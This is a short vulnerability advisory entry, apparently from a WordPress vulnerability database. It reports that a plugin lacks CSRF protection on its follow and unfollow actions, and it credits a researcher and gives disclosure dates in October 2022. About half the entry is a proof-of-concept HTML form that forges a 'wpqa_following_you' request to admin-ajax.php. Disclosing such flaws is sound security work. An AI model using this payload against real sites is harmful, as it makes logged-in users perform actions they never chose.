The plugin does not have CSRF check when following and unfollowing users, which could allow attackers to make logged in users perform such actions via CSRF attacks
<html> <body> <form action="https://example.comwp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpqa_following_you" /> <input type="hidden" name="following_var_id" value="9839" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Bikram Kharal
Bikram Kharal
Yes
2022-10-25 (about 5 months ago)
2022-10-25 (about 5 months ago)
2022-10-26 (about 5 months ago)